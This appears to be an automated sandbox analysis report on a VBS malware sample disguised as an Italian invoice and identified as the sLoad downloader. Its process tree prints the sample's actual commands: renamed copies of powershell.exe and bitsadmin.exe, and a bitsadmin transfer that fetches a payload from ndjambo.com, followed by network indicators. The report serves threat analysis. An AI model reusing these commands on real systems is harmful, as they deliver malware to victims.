Analysis

  • max time kernel
    86s
  • max time network
    158s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    20-05-2022 15:02

General

  • Target

    FattDiffEmessa2020 03799870369/FattDiffEmessa2020 03799870369.vbs

  • Size

    3KB

  • MD5

    ba1697038db097aae963962a1fd5dd15

  • SHA1

    46e3f1b7e3c93f3de52d63a1afb3b6f6c17180b8

  • SHA256

    79b59d0b510fb8855ee624fd51b46c2b4f1cccef9294860f9864f00183b07e2c

  • SHA512

    d45c7b86124b760381e36eeb301c2fba631e38b3ba537187ca059238eb2692531dda9efaa0ed0806c2530794b9fcd4f70e872ff6da2984d31ea812e6e177fb64

Score
10/10

Malware Config

Signatures

  • sLoad

    sLoad is a PowerShell downloader that can exfiltrate system information and deliver additional payloads.

  • Executes dropped EXE 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious use of WriteProcessMemory 7 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\FattDiffEmessa2020 03799870369\FattDiffEmessa2020 03799870369.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1912
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\pDrBqNtd.exe
      2⤵
        PID:3484
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\bitsadmin.exe C:\Users\Admin\AppData\Roaming\DrBqNtd.exe
        2⤵
          PID:3656
        • C:\Users\Admin\AppData\Roaming\DrBqNtd.exe
          "C:\Users\Admin\AppData\Roaming\DrBqNtd.exe" /transfer bHybPh /download https://ndjambo.com/jaluma/03799870369/it.gif C:\Users\Admin\AppData\Roaming\it.gif
          2⤵
          • Executes dropped EXE
          PID:1716

      Network

      • flag-us
        DNS
        ndjambo.com
        Remote address:
        8.8.8.8:53
        Request
        ndjambo.com
        IN A
        Response
      • 104.110.191.133:80
        104 B
        2
      • 20.189.173.1:443
        322 B
        7
      • 8.253.135.120:80
        46 B
        40 B
        1
        1
      • 104.110.191.133:80
        322 B
        7
      • 92.123.140.25:80
        322 B
        7
      • 8.8.8.8:53
        ndjambo.com
        dns
        57 B
        130 B
        1
        1

        DNS Request

        ndjambo.com

      MITRE ATT&CK Enterprise v6

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Roaming\DrBqNtd.exe

        Filesize

        182KB

        MD5

        f57a03fa0e654b393bb078d1c60695f3

        SHA1

        1ced6636bd2462c0f1b64775e1981d22ae57af0b

        SHA256

        c93b7734470cf96c5170f7b21f361cdf3f74ca819626c83c4b8a68210deeb35c

        SHA512

        7e84dd9a3e29523d25c0927424261ced908191e3151c9802b61fa3c5fe13d1192d19996cb435bb6d9be5731b8370e8ffb6ad26a4ba0733e212a103eb0bd75a2a

      • C:\Users\Admin\AppData\Roaming\DrBqNtd.exe

        Filesize

        182KB

        MD5

        f57a03fa0e654b393bb078d1c60695f3

        SHA1

        1ced6636bd2462c0f1b64775e1981d22ae57af0b

        SHA256

        c93b7734470cf96c5170f7b21f361cdf3f74ca819626c83c4b8a68210deeb35c

        SHA512

        7e84dd9a3e29523d25c0927424261ced908191e3151c9802b61fa3c5fe13d1192d19996cb435bb6d9be5731b8370e8ffb6ad26a4ba0733e212a103eb0bd75a2a

      We care about your privacy.

      This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.